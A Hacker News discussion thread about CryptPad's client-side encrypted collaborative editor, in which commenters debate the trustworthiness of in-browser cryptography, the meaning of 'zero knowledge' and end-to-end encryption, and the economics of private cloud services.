Hacker News new | past | comments | ask | show | jobs | submit login
Time to Encrypt the Cloud (cryptpad.fr)
160 points by dansup_ on Feb 21, 2017 | hide | past | favorite | 101 comments



The problem with in-the-browser encryption is that it is fundamentally insecure until websites can be made immutable. You're executing remote, mutable code to handle your secret data. Which means at any point the website operator could replace it with something that exfiltrates the data the moment you access it.

Even if the operator is not malicious they could receive a court order or the connection loading the code could be MITMed even if you think you're secure[0].

[0] https://medium.com/@karthikb351/airtel-is-sniffing-and-censo...


Its a bit harder to exploit, but this is also a problem with mobile apps. The developer could be compelled to release an update which leaks data to a 3rd party for specific users. Even for opensource projects there's no guarantee that the published version of the app matches anything in the commit history. And I doubt anybody looks inside the binaries that get published to the app stores when there's source code available.

So right now on web or mobile you simply have to trust the app developers.

Apple & Google could easily fix this by copying the docker registry. Just run a build process themselves directly from a specified git SHA. Publish that & name the repo & git SHA they used for the build. That way security researchers could go read the sourcecode and know that its the actual code running on everyone's phones.

Mind you, doing this would make it easier for the US government to compel apple or google to modify a binary for just one user. But apple and google can already do that if they want to.

Another approach would be to make the whole toolchain build reproducible binaries, so a researcher can run the build process themselves and verify the binary hashes match.

But lets not pretend that somehow apps are more secure because you download a sandboxed app from an app store instead of sandboxed JS + HTML. The tech stacks used to deploy code are more similar than they are different.


> Even for opensource projects there's no guarantee that the published version of the app matches anything in the commit history.

But at least for opensource, if you are willing you can build your own binary, using your own tools, from the source in the commit history, and get an app that matches the commit history [1].

[1] Exclusive of the issues detailed in "Reflections on Trusting Trust" by Ken Thompson regarding the actual build tools themselves (https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...)


F-Droid does builds themselves!


The Airtel story is interesting. I've experience this in India, but it's usually just DNS level blocks. Didn't expect it to manifest as an HTTPS MITM. That's a massive fail on Cloudflare's part.


That was entirely The Pirate Bay's fault, not CloudFlare's.


I mean it's deceptive to the general public to even call it flexible SSL and offer it as a product. False sense of security is worse than no security.


Subresource integrity [1] helps make sure that the javascript referred to by the page is really what gets served. The common usecase talked about is to ensure that a compromised CDN can't attack big chunks of the internet.

The page itself can still be modified, but there are mitigations that can be performed if you're paranoid enough.

1. https://developer.mozilla.org/en-US/docs/Web/Security/Subres...


The threat model I stated included the future compromise of the second party (the hoster). SRI only helps against untrustworthy 3rd parties (CDNs). So it does not really address the issue.


I've been thinking about this problem for Airborn OS. In my opinion, the best place to put signatures of the "main resource" would be the website's certificate. [1]

I created a Firefox extension that can check signatures both in the certificate and (in the meantime) hardcoded in the extension. [2]

[1]: http://blog.airbornos.com/post/2015/04/25/Secure-Delivery-of...

[2]: http://blog.airbornos.com/post/2016/02/23/The-first-web-appl...


Well if you trust the website at least once, it can load a service worker which will verify signatures of any app/script updates from any party before allowing them to update the locally cached version of the script.


Service workers can get wiped on hard refreshes or due to space constraints. And they are not easily transferred to new devices, unlike packaged applications. They're not a security mechanism.

And it does not necessarily address the compromise of the hoster either, since the attacker who has control over that may also have access to the signing keys. Especially in the case of a court order.

That effectively is a silent, user-targetable auto-update of software to which you entrust your secret data.

Auto-updates for crypto software should be verifiable through other channels, require user confirmation and use a distribution method that is difficult to scope to a single user to make targeted attacks harder.


Trusting someone to honestly serve you a piece of html is an easier thing to develop and check. You can always save a copy of it to your machine and check it and run it from there.

It's true that these are not great against a state level actor deliberately targetting an individual (but then, not much is), but e.g. in a lot of situations I would trust github to serve me unmodified html and s3 to store my encrypted data, where I might have not trusted a single entity to provide me with an integrated solution.

It would be great though if a page could indicate that it is sensitive and then if the browser sees it change it pops up a message on the client giving the user a fingerprint and notifying them of the change.


If I publish my application on GitHub, how can you know for sure I didn't make changes on the server side? Appearance looks the same m, hence why SRI only solves the front end trust, but the entire as a whole remains a blackbox, thus what previous OP meant.


Depends on the app. If you are making a storage app then you can do client side encryption so that it doesn't matter if s3 is compromised, they don't have access to your data.

SRI means you don't have to worry about your js getting modified so all that's left is the html. My claim is that there are lots of situations where I can trust something to serve html honestly enough for my use.

It is possible that my bias for web apps that connect to real services (of the sort a desktop app might) rather than as a thin veneer over a black box service gives us a different perspective.

But I do ultimately agree that some support for enhancing trust in the initial html document should be built into browsers. I guess such a thing should involve being able to get a hash of the actually downloaded and running code and document and being able to postpone an update until I've had the opportunity to check it's legitimate.


Immutability isn't a great option for obvious reasons.

Trackability would be nice though. Imagine if web data served off a domain could be dug through like a git repo. If you could see every commit and diff, and if proof of malice would be indisputable. Then, even if bad people did take over the domain, it would be detected immediately, and its reputation rating would drop so low that browsers would refuse to connect to it.


Well, take cryptpad. The link could define the version of the code, and the browser could enforce that it never changes. everything else is communication with the server - something you can audit, given never-changing code. Bugfixes are of course prevented, but that just means you need to bake in a "check for updates" link - there's no reason that URL needs to change, just the contents at it, which you don't need to trust like the cryptpad's pad source.

How to achieve this, no idea. Or, several ideas, but nothing general enough ¯\_(ツ)_/¯


What happens if, say, you Torify the code element? Such that it's not possible to identify a specific user by name?

Or have some, say, third-party hash proof of the download? (Essentially signed downloads.)

Or if the system is blind to the identity of the user requesting information? Reads need not be authenticated, only writes, which would have to match some signature, say.

(I'm aware of numerous browser problems, I'm looking at ways around them.)


It's not about being immutable, but about verified and signed builds (see codehash.db)


Even if that is done, there has to be verification for absence of security vulnerabilities in the app itself, because if data can trigger code execution, you're done. It's much easier to manipulate its own data for the web service itself than for other parties trying to exploit XSS vulnerability.

In other words, you must ensure that the frontend treats the entire backend as a hostile actor, not just the code it serves, but also the data.

Not all web frontends are written like that; many serve HTML snippets that get pasted into the DOM unchecked, instead of passing JSON data and rendering on the client side. You can sign the static frontend code all you want, and you're still owned by the service itself in this case.



No, that just is a hint for caching. Caches naturally evict entries and eventually reload the content.

For security you don't need an immutability-hint, you need it enforced.


IPFS is the way to go.


There's nothing Zero Knowledge about this.

I'm starting to think that Spider Oak has destroyed the meaning of the term. Apparently Zero knowledge now means E2E.


I definitely think that cryptpad.fr doesn't know the meaning.

Keybase's entire purpose is to make a public database of people. They know who you are, therefore, they have some knowledge.

Not that complicated. If you store user profile data and therefore link the data they store to that profile, it is not zero knowledge.

Arguably, if you have to charge money for a service, you might need a way to do that, but then you're not zero knowledge. Or you just a flat rate with unlimited of whatever your service provides.

I don't think it makes a lot of sense to trust a company that claims to be secure when they don't understand even the terminology, let along the complexities, of providing security and privacy.


Before Spideroak started (ab)using the term in this way, the password manager Clipperz did as well. However, they saw the error of their ways and switched from "zero-knowledge web apps" to "host-proof web apps," which arguably is a better concept. Unfortunately, it never caught on and seems to have died out as Clipperz stopped being actively developed.

Spider Oak has also dropped the term and now goes with "no knowledge."

https://clipperz.is/about/#why-web-cryptography-does-matter

https://en.wikipedia.org/wiki/SpiderOak#History


If the system relies on user Peggy demonstrating to service Victor that Peggy knows the keys that decrypt or access information, then the system approaches the traditional meaning of "zero knowledge". (Peggy being Prover and Victor being Verifier, see the ZKP Wikpedia page.)

If the system can work with Victor knowing anything else about Peggy, e.g., entirely taking the question "who are you" out of the equation, well, then, we've got an interesting situation.


If Alice can share notes with Bob in a manner where the service itself cannot determine that Alice and Bob have any connection at all, then go ahead and market that as Zero Knowledge. If the service can determine who is talking to who, though either passive or active means, then it is disingenuous to claim the service is Zero Knowledge.

Unless the anonymity set is very small or bandwidth is infinite, accomplishing metadata privacy requires some kind of zero knowledge proof.

I don't think such systems necessarily require E2E encryption. If the term zero knowledge continues to be misused, it's going to cause more confusion later when services get around to protecting metadata.


Fair points. I've misused the term myself (in ignorance), and can see how this could easily get transformed by a nonexpert public.


Any time anyone misuses "zero knowledge", please direct them to this page: https://paragonie.com/blog/2016/08/crypto-misnomers-zero-kno...


Isn't zero-knowledge a subset of end-to-end (where both ends are you)


No, it's not.


Well, who decides what it is? When security words go marketing, it's pointless to argue. Zero knowledge is yet another "military grade" buzzword.


You're right that marketing can sometimes make what was once black into white, but that doesn't make it true.

A phrase like "military grade" is now and was always a meaningless, nonsense phrase used to suggest robustness. No military has actually defined any "grade" of encryption to measure with. It's like saying that your ladies deodorant is "Strong Enough For a Man". Sure, whatever.

End to end encryption (E2E) on the other hand means something specific: The secrets critical to the security of the system live on the end user devices. If a standard webmail service claims to be E2E, it's not marketing, it's lying.

Likewise, zero knowledge has a well defined meaning. It's a protocol where a Prover convinces a Verifier that it has some information, without actually revealing what that information is. For example, Peggy could have a set of public keys, whose order she has randomly shuffled. She can prove to Victor that the output of her Shuffle is a valid permutation of the keys, without revealing to Victor what order they were in before she shuffled them.

Zero knowledge protocols are useful building blocks for such tasks as:

- Mixing messages in a way that prevents a global passive adversary who also maliciously runs some of the routers in a network from learning the social graph of users (Tor cannot do this, because it is not zero knowledge)

- Verifiable secret ballots. Voting systems where you receive proof that your ballot was cast as you intended, but you can't use the proof to convince anyone else. (To mitigate vote buying/voter intimidation)

- Offering a database where users can query information, but the database operators cannot know what records have been requested

If a product doesn't provide such features, or doesn't make use of a zero knowledge proof, then calling it zero knowledge is nothing more than a brazen lie.


The secrets critical to the security of the system live on the end user devices:

Ok so my desktop is device #1, and mobile is #2. I encrypt a note on desktop, then "query information, but the database operators cannot know what records have been requested" with device #2, it seems this concept fits to end-to-end definition you gave?

I really think both terms are so vague that can be bended in a way that they look interchangeable. And nothing wrong about it.


They are two very different things.

E2E is a term that dictates that when I send information, only the intented reciepient can decrypt it, under the assumption that the keys are safe.

Zero knowledge proofs is a constuct where I can prove something to you, without leaking any information. For instance, you want to buy a house, but before the seller wants to sign, he wants proof that you can actually pay x $ in down payment. Traditionally you would go down to your bank, get a piece of paper stating that you have x $ locked and only usable for this purchage for the next 60 days. It doesn't say how much you have in your account, where the money is from or anything else. A zero knowledge proof is the same, just digital.

E2E would not help here, because it doesn't prove anything, it's just a term about the comunication being safe.


I know what you mean, ZK as in password auth. Then why in the first place encrypted storage was called zero knowledge? Complete misuse of the term.


Not really. My example could just as well be done with any public key crypto system. If you want better examples, see the SO post https://mathoverflow.net/questions/22624/example-of-a-good-z...

But misuse of the term is most likely just because they didn't understand it in the first place. It is well defined, but rather abstract.


Because if you encrypt data before uploading it to a server, the server has no (zero) knowledge about what that data is?



They're not mutually exclusive terms. You can have one without the other. The database that supports zero knowledge queries can be a plaintext patent database. You can do research without leaking what you're researching, however the records themselves are not confidential between a sender and recipient therefore it would be wrong to claim such a system is E2E, even though it is zero knowledge.

Take your example, you upload 10 notes to a server with device #1 and then retrieve a few of them with device #2. The server knows exactly what 10 notes you uploaded and exactly which of 3 of the 10 were read by the second device. It also knows when the uploads and downloads occur. Since it knows #2 downloaded a subset of what #1 uploaded, it can conclude that #1 and #2 have some kind of relationship. (eg. Both are your devices, or one device belongs to your friend with whom you have shared 3 of your notes) This is E2E but not zero knowledge.

Now imaging incorporating both E2E and zero knowledge techniques into a note sync system:

1) All notes are encrypted end to end. That is, the servers that store and route notes never learn the secrets necessary to decrypt them

2) Notes sent into the system are routed through a mixnet that uses verifiable shuffles so no one passively watching all of the users and system (or actively running malicious servers or clients) can learn who is sending which note ciphertext.

3) Note ciphertexts are retrieved from the system using private information retrieval so that observers and cheating servers don't learn who is receiving which one or when it's been received.

This system isn't going to learn anything about how many devices you have or who you share with. And it's going to prevent further analysis of metadata: For example, device #1 and #2 keep matching sets of notes and they frequently connect from the same IP addresses, therefore it's safe to assume these devices are owned by the same person. Device #3 requests a subset of notes that were uploaded by #1 and #2, but always from a different country. Now #3 retrieves a note posted by #2 from the same IP address that #1 used recently. Therefore it's safe to assume that the owner of #3 is visiting the owner of #1 and #2.


I love ansuz's and cjd's work on CryptPad! I use it daily as my personal notes wiki synced between 3 computers, and occasionally for collaborative notes taking in video calls with ~15 people. My happiness levels have increased with every new iteration of features and fixes.

I recently suggested to add a frontend for collaborative agile retrospective boards, similar to Retrium. CryptPad seems pretty pluggable in that regard, and actually TIL it can even edit presentation slides now :)


CryptPad is pretty solid, definitely a step up from Etherpad Lite. Curious how CryptPad's encryption could be leveraged in a replacement for uppit, as another reddit from source install is obviously not a great idea.


  We do this by adding a hash character (#) to a link. 
  By design, browsers don’t share anything after this 
  character.
...and I stopped reading there.

It is astonishing to read that. Just absolutely mind blowing.

Browsers absolutely can and DO share things coming after the hash (#) character in a URL. How?

JavaScript! It's absurdly easy to siphon anchor hashes out of the address bar with JavaScript, and send them back to the mothership, or anywhere else for that matter. It's basically how oh-so-many Very Big Websites work.

Are you kidding me?!


I think you're being overly obtuse. The point they're making is that browsers don't automatically send anything after the # to the server.

This makes it possible to implement apps where all decryption is done on the client and the server never sees either the plaintext or the key (which they are mistakenly calling 'Zero-Knowledge' apps).

Whether this is beneficial, and how easy it is to bypass (court order to modify the JavaScript, MITM to modify the JavaScript, extensions which dial in to the mothership with all URLs including the hash fragment), is another question.

But if you assume that your browser or that app are compromised and arbitrary scripts are running in it, then the attacker already has access to all the data anyway, and the location hash itself becomes irrelevant.

They don't claim it's a silver bullet, but they rightfully claim that this at least has the benefit of protecting your data in case someone leaks or sub-poeanas it from the servers hosting it.

Many web apps successfully use this model, most notably client-encrypted pastebin clones like privnote and password managers like KeePassWeb and LastPass.


It's not the browser sharing the hash content, but the javascript in the page. In something like this you clearly have to trust the javascript you download each time in the page.



Is that attack possible over https, without compromising a CA or a local hack like sslStrip? If a page is doing secret stuff over http it's even more broken.


>> "The usage of HTTPS in combination with HSTS can reduce the effectiveness of QI. Also using a content delivery network (CDN) that offers low latency can make it very difficult for the QI packet to win the race with the real server."

Above is from the researchers: https://blog.fox-it.com/2015/04/20/deep-dive-into-quantum-in...


It's not clear to me how it is possible over https only sites without forging a certificate or MITMing the connection. The new content would have to be encrypted with the correct key.

If indeed this is possible then the internet is totally broken. "Reduce the effectiveness" implies that it is still possible though.


Not sure it means the internet is broken, but would mean SSL is broken.


Took the words out of my mouth. Glad to see someone else commenting on this. As soon as I saw that I was thinking..."well, gee, that seems like a terrible idea".


Not only that, there are tons of poorly coded bots that will remember and request entire URLs complete with the hash and hash content.


There have been lots of malicious chrome extensions in the past that essentially sent all your visits (with the location hash) to a server.


People don't care about privacy in the abstract, and won't, until they are really harmed by the loss of it.

It's not only ordinary people who don't care about privacy. Even businesses who have a great deal to lose from loss of privacy, still use Slack and Gmail. (Indeed, I bet even Google competitors use Gmail).

The real angle is theft, not privacy. Companies are always stealing all of our data, which is why it's so cheap. If we took steps to protect it, serious steps that actually denied companies the knowledge that drives their growth, then we'd have gained something valuable. The unfortunate truth is that people won't protect what they've come to believe is worthless, and so it will remain worthless. A chicken-and-egg problem, to be sure.


It's kind of a Gresham's Law dynamic in that regard.

Thing is, when people do realise they care about privacy, they're going to really care about it.

https://cryptpad.fr/pad/#/1/view/+VGaPJa1oHnDhNfGTugy+Q/gTSc...


I think a world where I could use cloud services for pictures/documents/driving/social/etc. without being tracked and exploited for either profit or manipulation would be wonderful. However, what would be the economic incentive to provide such a service at Google- or Facebook-scale, free of charge (via up-front subscription fees, of course)? Is there a business model that is able to ignore the advertising and marketing value of your data, yet still provides enough value to fuel the growth that Google, Facebook, and others have experienced? Asked another way, would these cloud/social services still be able to exist as we know them if their providers were not allowed to collect and exploit this data?


Theoretically what you are describing is Apple iCloud business model.

But some might say that because it's not open source you can't trust them.

Personally I trust the money I give them, they promised me privacy, I pay monthly, if I am ever betrayed I'll leave apple ecosystem forever and they will get less money. So they basically have no incentives to lie to me. Yes it's all based on trust but this always come to that at some point.


You may have overlooked that apple is a hardware company, services they offer are complementary to the hardware they sell. Their incentives follows what sells more hardware.

If forfeiting icloud privacy gives them access to a billion new hardware customers (hello China!) as iphone sales are dwindling, do you really believe they will stick behind icloud privacy ? The point being that they may have more incentive to break their privacy promises than you think.

But still, at the moment apple being a hugely succesful hardware company gives it less incentives than say an advertising network (hello google), a "give us all your data and we'll make it available online for you, also ads" (hello facebook Inc.) as their revenue depends mostly on hardware not on ads or software licencing or investor story time. This may change when profits and sales go down, we have already witnessed other hardware vendors making moves such as lowering item sale price with a strategy to recoup the loss with exploiting/reselling user data later (hello samsung).


> But some might say that because it's not open source you can't trust them.

And should it not be the case? Theoretically.

As for the reasoning why they do not have incentive to lie to you goes same for anyone and pretty much anything where a wrongdoing takes place that shouldn't have happened in the first place. It could be anything. If we go for examples it will be stretching it just too far.

The middle ground can be - an easy backup/sync/mail service that does the heavy lifting - the transport work and we encrypt decrypt on the client side. For example, we can't have a transportation company if all we have to do is send a few packets every month across the company or globe. But we can have an unbreakable lock/safe/package in which package the stuff and the receiver is the only person how to open the stuff. I have never really been good at analogies but I hope you get the drift.

If only they could write an easy app that uses the service APIs and code for that app is open source and all it does is encryption decryption (generally speaking) on the client machine. Something BackBlaze and CrashPlan claim to do (they are closed source btw) and so does Tarsnap (haven't used it - too complex and pricey for my use case; and not sure if it's open source).


Tarsnap (haven't used it - too complex and pricey for my use case; and not sure if it's open source).

FWIW, Tarsnap is not under an open source license, but you do get the client source code (and you're encouraged to audit it before compiling).


> However, what would be the economic incentive to provide such a service at Google- or Facebook-scale, free of charge (via up-front subscription fees, of course)?

I'm not quite sure what you mean by "free of charge (via up-front subscription fees, of course)" here. Do you mean an extra "free" feature on top of your paid subscription or do you mean a freemium model where everyone gets the feature but the free users are subsidized by the paid users? Or do you mean totally free?

In the first two cases, I'm afraid the answer is that the only economic incentive is people making purchasing decisions based on the feature being present. If there's no increase in demand, there's no economic reason to implement it. Unfortunately, aside from the HN crowd, not many people seem to care much about privacy.

In the last case, I think it's never going to happen. Nothing can live long without money and if your users aren't your customers, they have to be your product in order for you to survive.

> Is there a business model that is able to ignore the advertising and marketing value of your data, yet still provides enough value to fuel the growth that Google, Facebook, and others have experienced?

I think WhatsApp has demonstrated this no? It's been a paid subscription from the start and as far as I know, the data hasn't ever really been used for marketing or advertising. It's fully encrypted now too.

> Asked another way, would these cloud/social services still be able to exist as we know them if their providers were not allowed to collect and exploit this data?

In terms of collection, some services require access to this data. For example Google can't send you a notification telling you about your flight status if it can't read your email to get your flight confirmation. It also can't recommend videos on YouTube or pay creators without access to watch histories. I also doubt that more basic products like Google Search can work as well as they do without knowing which links you're clicking to tell them how good the results are.

In terms of exploitation, I think there's definitely an argument for users paying to, for example, not be advertised to or have their data withheld from marketing exchanges, however there's no demand for it.


>I think WhatsApp has demonstrated this no? It's been a paid subscription from the start and as far as I know, the data hasn't ever really been used for marketing or advertising. It's fully encrypted now too.

No. It's been bought out by facebook Inc. in 2014.

excerpt from whatsapp legal info:

If you are an existing user, you can choose not to have your WhatsApp account information shared with Facebook to improve your Facebook ads and products experiences. Existing users who accept our updated Terms and Privacy Policy will have an additional 30 days to make this choice.

But for new users, well tough luck !

Their encryption was criticized when it was shown that it is implemented in a way allowing whatsapp to replace the key transparently without notifying the user.

Bonus excerpt from whatsapp legal info:

As part of the Facebook family of companies, WhatsApp receives information from, and shares information with, this family of companies. We may use the information we receive from them, and they may use the information we share with them, to help operate, provide, improve, understand, customize, support, and market our Services and their offerings. (...) Facebook and the other companies in the Facebook family also may use information from us to improve your experiences within their services such as making product suggestions (for example, of friends or connections, or of interesting content) and showing relevant offers and ads.


> In terms of exploitation, I think there's definitely an argument for users paying to, for example, not be advertised to or have their data withheld from marketing exchanges, however there's no demand for it.

Where do you get the idea that there is no demand for this ? It's a recurrent demand and it is consistently declined for business model reason by the facebook-like (see investor storytime[1]).

Then there is a compelling argument that paying not to be advertised is only going to make you a more valuable target to be advertised to.[2]

Likely paying for having your data withheld from marketing exchanges will increase the price of your data on the market while not providing you any way to be sure it has effectively been withheld.

The only way is for this data not to be collected in the first place.

[1]: https://www.theatlantic.com/technology/archive/2014/08/adver... [2]: http://zen.lk/2015/07/19/Why-you-will-never-escape-ads-by-pa...


I don't think it matters much what the business model is. As long as software services are provided by centralized, for-profit entities, exploitation won't stop.

A free, open source, peer to peer infrastructure is the only way out.


Why do business models not matter? Business models are expression of self-interest and self-interest always matters.

Not for profit organizations have self-interest too. We just don't always know what it is.

I think what we should be looking for is alignment of self-interest and where that is not possible we need good balance of power.


In my experience, the only interest of most for-profit corporations is maximizing next quarter's profits. If they can get away with raising the prices to the extremes to achieve that, they will. If they have to offer their services for free and balance that by exploiting their users' data or attention, they will. If they have to shut down some services or even "pivot" the entire company to a completely different domain, they will do that.

I don't see how any of that is aliged with the users' interest. Of course, they will also spend quite a lot on marketing, trying to make you believe the opposite.

Also, in addition to the business model, the whole entity of a for profit corporation is rather transient. And when we're talking about an infrastructure for storing, relaying and accessing information, that's definitely not a good thing. I don't think google, facebook, dropbox or github will be around in a couple of decades, due to political and economical reasons. It's hard enough to keep information around the face of technological advancements (new hardware architectures, protocols, algorithms, data formats, etc), so we really don't need these additional obstacles.


There's a new type of business model emerging, IMHO.


Can you elaborate? I'd be interested to hear more details, and I think others might be as well


Not the parent, but tech-savvy consumers are willing to pay more for a better service. If there was an email provider better than gmail, with no spying, total transparency etc, many here would switch in a heartbeat even if it costs $5/month.

Not sure why GP assumed this must be free of charge; tech-savvy consumers also tend to have money.

If there was a cloud provider with solid infrastructure, full transparency and insight to the network down to server cams, all based on free software, would you have paid extra for it?


This is, in fact, what I did when I switched to Fastmail. Others looking for absolute security over convenience have gravitated towards ProtonMail. I also discovered other perks to having a paid email service... like getting customer support.


I'm a bit late, but sure!

Think about MSP models for a moment. Consider how they morphed into SaaS models over time. That "morphing" involved moving the data from an on-prem location to the "cloud". If you look under the hood of infra while this was going on, you see lots of innovation occurring with networking, compute resource allocation, security, storage, etc.

Now think about SaaS moving on-prem. A company has a bunch of their own infrastructure spread across both public cloud and private cloud systems. They want some of that software to have the benefits of SaaS. They want some of that software to be as secure as running it on-prem.

If we can manage to create the right software to enable it, there will be a new business model based on running someone's SaaS software on your own machines. There needs to be a way to deploy this software, and do updates and maintenance of course, but there also needs to be a way to pay for use, updates and that maintenance.

Older models of using license keys isn't very secure and doesn't scale the way SaaS services do. So, you might end up seeing a model like Splunk's, where usage defines license costs. Trouble is, that licensing engine is a pain in the ass to maintain for companies and requires what most to be considered obfuscation to make it secure, guaranteeing payments for use.

If you add cryptocurrencies to the mix, then you have a way to implement a lightweight federation across all types of infrastructure and tie it to the deployment. I won't go too far into the details of that here, but that's what I'm working on currently, and have been working on for a while.


Encryption will only solve a portion of the problem. Google knows how old I am. They know my sex. That can be fairly accurately derived by browsing habits alone. I receive targeted ads for common health problems for people of my sex in my age group. If I ever click on one of those ads, they now 'know' that I have that condition... and consequently, now my data is worth more at the time of sale. Same for Amazon. Same for Facebook.

It's not an easily solved problem. The best solution I've seen is Tor, but then, using that will put you on several watch lists. If that is to ever change, we need something like Tor built into a browser as incognito mode to make it widely accessible.


> If I ever click on one of those ads, they now 'know' that I have that condition... and consequently, now my data is worth more at the time of sale. Same for Amazon. Same for Facebook. >It's not an easily solved problem.

If everyone clicked on stuff they aren't interested in that helps solve the problem.

Also try getting children to use your computer and click ads - that really confuses them. :)


> Also try getting children to use your computer and click ads - that really confuses them. :)

It confuses the children? :)


> using that will put you on several watch lists

Name one "watch list" that you get put on for using Tor. That's ridiculous. Even with Rule 41 there aren't any additional watch lists. It's this exact fear and unfounded self censorship that destroys a society quicker than any actual oppressive regime could.



It's not clear that these are "watch lists" in the sense that the parent or grandparent poster referred to, which would probably refer to something that automatically gets the individuals on it ongoing further attention or disparate treatment by the government. We still don't really know exactly what XKS is used for; some people seem to have interpreted the "scores" that are generated as though they were akin to the Chinese social credit score scheme (something that stays with an identified individual persistently), but I haven't seen evidence that this is true. It seems to me that XKS is a language and system for defining packet capture "scores" that search and capture Internet traffic meeting certain criteria, including arbitrary analyst-defined relatively-high-level criteria. Although an analyst using XKS to spy on particular people may know or learn their identities in many ways (and something bad could happen to them as a result), I don't see an indication that XKS is, or is linked to, a database that automatically "scores" or "watchlists" people.

In a traditional "watch list", those listed can expect to automatically encounter more scrutiny or problems from government officials in some kinds of interaction, like trying to board a plane, trying to enter the country, or maybe interacting with law enforcement or trying to file taxes. The XKS rules have in common with this that some people get more and different attention than others (which I can readily agree implicates their rights), but maybe in a particular moment as part of an analyst's activity, rather than in a way associated permanently with their identities.

While I certainly don't think anyone should have the power to perform searches like these, I feel like different senses of "list" are being conflated here, especially in the grandparent post's notion of "several watchlists". (I've been a part of the Tor community for a long time and have never heard of a report of anybody receiving adverse treatment from a government that could be attributed to Tor use this way... though it's certainly plausible that Tor users do get singled out in various ways by various governments for further spying.)


The biggest problem with encrypting cloud storage by default for everyone is not technical. It's that the consequences of losing keys is 100% data loss. That is not generally speaking a good default design choice for average users who want to entrust, say, a lifetime of photos to the cloud.

Encrypted storage is a great tool to have, but because the consequences of losing keys are so severe it should usually be an opt-in choice where the user has to positively acknowledge the consequences of losing their key. For most consumers that's going to be for special cases.

It's probably the reason why Apple, which has been at the forefront of E2E encryption with iMessage, does not offer general E2E encryption of iCloud. It does however offer it in the form of encrypted notes in their Notes app. So you can opt in to encrypted storage of secrets, but you'll still recover your photo library if you forget your keychain password.


If apple's primary concern for not offering icloud zero knowledge encryption was that people may lose their data through loss of key why do they offer exactly that option with their secure vault ?

It is expected that encrypted data will be lost when the key is lost, security comes at the price of convenience.

I disagree that this should be an opt-in choice for an encrypted online data storage service, the whole point of it being encrypted is to make sure it cannot be accessed without the key thus preventing the service provider from being a potential privacy breach point. In post-Snowden times where online privacy requires encryption, always-on encryption for a third party data storage service makes sense and caters to the growing demand for online privacy.


> why do they offer exactly that option with their secure vault?

You mean FileVault, their disk encryption? Time Machine backups are not encrypted by default. You have to opt in.

If you mean Keychain, their password manager, that's a good example of a high-security special case. And there are usually ways of resetting lost passwords so you may still survive the loss of your Keychain key.

This is not a matter of "convenience"... Apple does not want a million customers crying at the Genius Bar over the permanent loss of a lifetime of photo memories because they lost their key, ok? You have to design systems expecting that normal people will lose their key at least once in their life. Have you ever lost the keys to your home? For most people, if you offered to improve the security of their home at the cost of incinerating the house if they lose their key, that would not on balance be a good default setup. Maybe for their safety deposit box it would, and only in cases where they'd rather destroy the contents than let them get into the wrong hands. But certainly it's not a one-size-fits-all good default config in all cases.


The customers have spoken, and they don't care.

Witness the popularity of Facebook and tell me the average person cares about privacy.


"All data, over time, approaches deleted, or public."

So which one is it in this case?

I think if you're offering something that isn't actually zero knowledge then the way to create trust is to use something our societies have invented a long time before web apps: Legally binding contracts that give sensible privacy guarantees and support a viable business model.

I fear that's the best we will ever be able to do when it comes to web apps that do more than just backup or data transfer.


I did something similar* with CKEditor and the id+key after the "#" like 3-4 years back when I was learning about real time and cryptography.

There were few practical problems that could not be easily resolved, the main one being that the server could send a different javascript payload (by modifying the HTML src) that leaks everything for specific clients and they wouldn't even know.

The most reasonable solution would be a plugin of sorts that freezes the front-end code and checks that the html+javascript has not been modified since last time, but this wouldn't be practical and has a totally different set of problems.

This scenario could happen if we consider real-world scenarios (imperfect/bad actors):

- Rogue hosting or admin: someone who controls the server decides to change the javascript. They are smart enough to change the checksum in the <script> so things still validate.

- Cracked ("Hacked"): there is a vulnerability in some part of the stack and the javascript gets changed unknowingly by the server admins.

- MITM for a badly configured server that accepts "http:" instead of "https:" and the user connects through a public network. Actually, the fact that it redirects http to https has its own set of problems for the people who might need this: http://security.stackexchange.com/q/44849/9161

Did you solve this? If so, how?

*I did the proof of concept mixing front with back-end and never fully ported it to front-end for the problems explained above.


For the MITM Part, I can think of:

- Send HSTS header in your code, instead of relying on the server). - Drop the connection if it is not secure. This breaks a reverse-proxy setup though.


Tangentially related is my open source project on an authenticated encryption filesystem: https://github.com/netheril96/securefs.


The whole idea of relying core security guarantee (provable 'no knowledge' on server side) on unreliable mechanism (in-browser cryptography) is feels really wrong.

There are many services which attempt to base their security on in-browser javascript cryptography.

What could be really valuable is not building Yet Another Service That Helps Privacy (but really, doesn't), but investing effort into building trusted execution models within the browser any website could utilize.

Secure apps will follow just instantly.


I might be a bit late to the party with this one but I just found https://github.com/duplicati/duplicati and it seems to be a very nice solution for encrypted cloud backups.

There's also https://github.com/ncw/rclone if you would rather do it more like rsync.


... and Cryptomator. It's open source and has clients for Windows, macOS, Linux, iOS and Android.

https://cryptomator.org/


Two components left: 1) storage of credentials to encrypt the vault (see my profile for a solution) 2) browser extension that verifies hashes of every HTML response


This looks a lot like monod

https://monod.lelab.tailordev.fr/

I've been using it as a private, sharable wiki for quite a while now.


The usability implications of not being able to access information if you lose track of the link will be enough to ensure this never takes off, let alone the vast security holes.


Encrypting locally before uploading to the cloud is probably the best solution. That way unencrypted data never leaves your local device.

You can do this with an app like VeraCrypt https://veracrypt.codeplex.com for DropBox or SyncDocs https://syncdocs.com for Google Drive.

Relying on cloud providers to protect your data is not a great idea - just ask Hillary Clinton about Podesta. Adding a separate layer of security and another means of authentication is more secure.


It's already pretty popular, similar to Mega.co.nz.


what's the source of how much the information are worth in dollars?


And how often? Is this a one time sell of information or monthly exchange? I was really curious about this piece of context as well.


Tresorit is way ahead of these guys...


Two things:

1. Don't just use cryptography, understand how Zero Knowledge encryption works. These 1 minute animated explainer videos do a good job: http://gun.js.org/explainers/data/security.html

2. We used the URL hash method they mention in the cryptpad article to create a beautifully simple P2P payment system (direct bank to bank deposits, no fees), completely end-to-end encrypted: checkard.com

It works and is a lot easier than people may think / expect to build!


I haven't bothered with the video, but the website is not only wrong but grossly ungrammatical.

"Most websites you use today have fake security. When you log onto their service, your password gets sent up to their proprietary servers. There they check to see if it is correct and grant you access to YOUR data."

"Sure, their servers might be in a top secret location. But the problem is that they know your password. Which means any bad actor, like a rogue employee, a hacker, or a government agency can snoop on your data without you knowing."

This manages to both mis-state how good password practices (hashes and salts) work[1], or what their ultimate failure mode is: your data are still sitting on someone else's server unencrypted. The password, however well hashed or salted, isn't proof against a warrant, hack, insider actions, or poor media disposal.

But given the elementary errors in the text, I'm pretty confident the video is not worth watching.

________________________________

Notes:

1. See e.g., https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet


